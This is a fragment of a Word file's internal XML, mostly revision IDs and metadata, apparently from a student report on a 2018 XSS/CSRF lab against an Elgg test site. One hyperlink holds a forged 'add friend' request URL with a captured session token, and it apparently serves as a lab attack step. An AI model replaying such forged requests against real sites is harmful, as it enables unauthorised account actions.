    <w:rsid w:val="00D40582"/>
    <w:rsid w:val="00D40FB8"/>
    <w:rsid w:val="00D4101D"/>
    <w:rsid w:val="00D4146C"/>
    <w:rsid w:val="00D42EAC"/>
    <w:rsid w:val="00D42FCF"/>
    <w:rsid w:val="00D4331F"/>
    <w:rsid w:val="00D437B7"/>
    <w:rsid w:val="00D43E04"/>
    <w:rsid w:val="00D446E2"/>
    <w:rsid w:val="00D453F1"/>
    <w:rsid w:val="00D46AA2"/>
    <w:rsid w:val="00D5133C"/>
    <w:rsid w:val="00D515CF"/>
    <w:rsid w:val="00D5216D"/>
    <w:rsid w:val="00D53D2D"/>
    <w:rsid w:val="00D54450"/>
    <w:rsid w:val="00D5628F"/>
    <w:rsid w:val="00D564CE"/>
    <w:rsid w:val="00D57EE0"/>
    <w:rsid w:val="00D6278D"/>
    <w:rsid w:val="00D63D74"/>
    <w:rsid w:val="00D6571A"/>
    <w:rsid w:val="00D6588F"/>
    <w:rsid w:val="00D71A0B"/>
    <w:rsid w:val="00D7329F"/>
    <w:rsid w:val="00D73F23"/>
    <w:rsid w:val="00D759EC"/>
    <w:rsid w:val="00D75E4E"/>
    <w:rsid w:val="00D77A2F"/>
    <w:rsid w:val="00D82159"/>
    <w:rsid w:val="00D82ABE"/>
    <w:rsid w:val="00D82D3C"/>
    <w:rsid w:val="00D838CA"/>
    <w:rsid w:val="00D86988"/>
    <w:rsid w:val="00D91329"/>
    <w:rsid w:val="00D931A2"/>
    <w:rsid w:val="00D9391E"/>
    <w:rsid w:val="00D9606E"/>
    <w:rsid w:val="00D9682A"/>
    <w:rsid w:val="00DA0CFC"/>
    <w:rsid w:val="00DA2E7A"/>
    <w:rsid w:val="00DA6183"/>
    <w:rsid w:val="00DA689C"/>
    <w:rsid w:val="00DB0A79"/>
    <w:rsid w:val="00DB10FC"/>
    <w:rsid w:val="00DB1922"/>
    <w:rsid w:val="00DB19F4"/>
    <w:rsid w:val="00DB1FA5"/>
    <w:rsid w:val="00DB2083"/>
    <w:rsid w:val="00DB54A6"/>
    <w:rsid w:val="00DB5656"/>
    <w:rsid w:val="00DB68E6"/>
    <w:rsid w:val="00DC02FB"/>
    <w:rsid w:val="00DC1733"/>
    <w:rsid w:val="00DC3AAA"/>
    <w:rsid w:val="00DC41D9"/>
    <w:rsid w:val="00DC5A8B"/>
    <w:rsid w:val="00DD0304"/>
    <w:rsid w:val="00DD03EB"/>
    <w:rsid w:val="00DD5CEC"/>
    <w:rsid w:val="00DD7C5E"/>
    <w:rsid w:val="00DE0631"/>
    <w:rsid w:val="00DE1B4C"/>
    <w:rsid w:val="00DE2646"/>
    <w:rsid w:val="00DE43CB"/>
    <w:rsid w:val="00DE47F7"/>
    <w:rsid w:val="00DE4A4B"/>
    <w:rsid w:val="00DE5355"/>
    <w:rsid w:val="00DE62F5"/>
    <w:rsid w:val="00DE6327"/>
    <w:rsid w:val="00DF0020"/>
    <w:rsid w:val="00DF13C8"/>
    <w:rsid w:val="00DF47B1"/>
    <w:rsid w:val="00DF5FBE"/>
    <w:rsid w:val="00DF6128"/>
    <w:rsid w:val="00DF6AF3"/>
    <w:rsid w:val="00E018DA"/>
    <w:rsid w:val="00E02F48"/>
    <w:rsid w:val="00E058D3"/>
    <w:rsid w:val="00E1259D"/>
    <w:rsid w:val="00E152A1"/>
    <w:rsid w:val="00E157A1"/>
    <w:rsid w:val="00E15DCF"/>
    <w:rsid w:val="00E169DD"/>
    <w:rsid w:val="00E20126"/>
    <w:rsid w:val="00E2340D"/>
    <w:rsid w:val="00E2613A"/>
    <w:rsid w:val="00E26AB0"/>
    <w:rsid w:val="00E307FA"/>
    <w:rsid w:val="00E3174B"/>
    <w:rsid w:val="00E328C7"/>
    <w:rsid w:val="00E331E3"/>
    <w:rsid w:val="00E3785E"/>
    <w:rsid w:val="00E41062"/>
    <w:rsid w:val="00E42D22"/>
    <w:rsid w:val="00E43DFC"/>
    <w:rsid w:val="00E45947"/>
    <w:rsid w:val="00E54241"/>
    <w:rsid w:val="00E54980"/>
    <w:rsid w:val="00E55640"/>
    <w:rsid w:val="00E63B3C"/>
    <w:rsid w:val="00E643AD"/>
    <w:rsid w:val="00E663A3"/>
    <w:rsid w:val="00E66423"/>
    <w:rsid w:val="00E66818"/>
    <w:rsid w:val="00E67E67"/>
    <w:rsid w:val="00E71BF9"/>
    <w:rsid w:val="00E7227C"/>
    <w:rsid w:val="00E7447B"/>
    <w:rsid w:val="00E80641"/>
    <w:rsid w:val="00E830F2"/>
    <w:rsid w:val="00E86F8A"/>
    <w:rsid w:val="00E912DC"/>
    <w:rsid w:val="00E91ECD"/>
    <w:rsid w:val="00E92A9E"/>
    <w:rsid w:val="00E92E07"/>
    <w:rsid w:val="00E96014"/>
    <w:rsid w:val="00E964B2"/>
    <w:rsid w:val="00E96B8D"/>
    <w:rsid w:val="00EA121A"/>
    <w:rsid w:val="00EA2BCE"/>
    <w:rsid w:val="00EA35F4"/>
    <w:rsid w:val="00EA3903"/>
    <w:rsid w:val="00EA3E86"/>
    <w:rsid w:val="00EA540D"/>
    <w:rsid w:val="00EA5647"/>
    <w:rsid w:val="00EA69BE"/>
    <w:rsid w:val="00EB3620"/>
    <w:rsid w:val="00EB3A61"/>
    <w:rsid w:val="00EB6B4E"/>
    <w:rsid w:val="00EB6BDE"/>
    <w:rsid w:val="00EC1253"/>
    <w:rsid w:val="00EC2D47"/>
    <w:rsid w:val="00EC38FB"/>
    <w:rsid w:val="00ED02A5"/>
    <w:rsid w:val="00ED0A23"/>
    <w:rsid w:val="00ED172B"/>
    <w:rsid w:val="00ED1A39"/>
    <w:rsid w:val="00ED22F5"/>
    <w:rsid w:val="00ED2EAD"/>
    <w:rsid w:val="00ED6F32"/>
    <w:rsid w:val="00ED72B0"/>
    <w:rsid w:val="00ED7F89"/>
    <w:rsid w:val="00EE1C63"/>
    <w:rsid w:val="00EE2E04"/>
    <w:rsid w:val="00EE35BC"/>
    <w:rsid w:val="00EE3A89"/>
    <w:rsid w:val="00EE540C"/>
    <w:rsid w:val="00EE7548"/>
    <w:rsid w:val="00EF438B"/>
    <w:rsid w:val="00EF7C06"/>
    <w:rsid w:val="00F01C5D"/>
    <w:rsid w:val="00F01DBA"/>
    <w:rsid w:val="00F02D22"/>
    <w:rsid w:val="00F038A7"/>
    <w:rsid w:val="00F06043"/>
    <w:rsid w:val="00F06128"/>
    <w:rsid w:val="00F1093D"/>
    <w:rsid w:val="00F11652"/>
    <w:rsid w:val="00F11743"/>
    <w:rsid w:val="00F11B45"/>
    <w:rsid w:val="00F12817"/>
    <w:rsid w:val="00F15C5F"/>
    <w:rsid w:val="00F202CD"/>
    <w:rsid w:val="00F225FE"/>
    <w:rsid w:val="00F227A6"/>
    <w:rsid w:val="00F23853"/>
    <w:rsid w:val="00F27E67"/>
    <w:rsid w:val="00F30497"/>
    <w:rsid w:val="00F30D14"/>
    <w:rsid w:val="00F333BF"/>
    <w:rsid w:val="00F33569"/>
    <w:rsid w:val="00F34863"/>
    <w:rsid w:val="00F35BDA"/>
    <w:rsid w:val="00F3677A"/>
    <w:rsid w:val="00F403D0"/>
    <w:rsid w:val="00F40BBD"/>
    <w:rsid w:val="00F41455"/>
    <w:rsid w:val="00F45882"/>
    <w:rsid w:val="00F45E8D"/>
    <w:rsid w:val="00F51626"/>
    <w:rsid w:val="00F53E1A"/>
    <w:rsid w:val="00F564B7"/>
    <w:rsid w:val="00F567FE"/>
    <w:rsid w:val="00F640CC"/>
    <w:rsid w:val="00F64EED"/>
    <w:rsid w:val="00F65C8F"/>
    <w:rsid w:val="00F7032A"/>
    <w:rsid w:val="00F710BE"/>
    <w:rsid w:val="00F72E1F"/>
    <w:rsid w:val="00F74461"/>
    <w:rsid w:val="00F74A7C"/>
    <w:rsid w:val="00F74EA4"/>
    <w:rsid w:val="00F75D03"/>
    <w:rsid w:val="00F75DDB"/>
    <w:rsid w:val="00F772E8"/>
    <w:rsid w:val="00F77B6F"/>
    <w:rsid w:val="00F8070C"/>
    <w:rsid w:val="00F8118E"/>
    <w:rsid w:val="00F81C61"/>
    <w:rsid w:val="00F82369"/>
    <w:rsid w:val="00F82520"/>
    <w:rsid w:val="00F86075"/>
    <w:rsid w:val="00F87C1E"/>
    <w:rsid w:val="00F90525"/>
    <w:rsid w:val="00F91287"/>
    <w:rsid w:val="00F91907"/>
    <w:rsid w:val="00F929AE"/>
    <w:rsid w:val="00F94FAF"/>
    <w:rsid w:val="00F95190"/>
    <w:rsid w:val="00F95B15"/>
    <w:rsid w:val="00FA0599"/>
    <w:rsid w:val="00FA703F"/>
    <w:rsid w:val="00FB0B90"/>
    <w:rsid w:val="00FB1CB7"/>
    <w:rsid w:val="00FB4B67"/>
    <w:rsid w:val="00FB6C26"/>
    <w:rsid w:val="00FC039D"/>
    <w:rsid w:val="00FC2890"/>
    <w:rsid w:val="00FC56C6"/>
    <w:rsid w:val="00FC5706"/>
    <w:rsid w:val="00FC65D9"/>
    <w:rsid w:val="00FC6BA4"/>
    <w:rsid w:val="00FD24B2"/>
    <w:rsid w:val="00FD24DD"/>
    <w:rsid w:val="00FD4252"/>
    <w:rsid w:val="00FD4275"/>
    <w:rsid w:val="00FD4B88"/>
    <w:rsid w:val="00FD51C5"/>
    <w:rsid w:val="00FD5AD0"/>
    <w:rsid w:val="00FD7C27"/>
    <w:rsid w:val="00FF0D77"/>
    <w:rsid w:val="00FF462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53AB"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{A379D944-8075-44D2-904C-77DCA08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F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3D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0F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660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7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C6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7D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hyperlink" Target="http://www.xsslabelgg.com/action/friends/add?friend=44&amp;__elgg_ts=1540772771&amp;__elgg_token=aeBua8N5vBvWKjMDx2urVw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8C83-BCC5-4CFA-8AD3-F42256A5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11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iaohan</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>W Xiaohan</cp:lastModifiedBy>
  <cp:revision>1050</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2018-10-09T03:21:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2018-11-05T17:47:00Z</dcterms:modified>
</cp:coreProperties>
</file>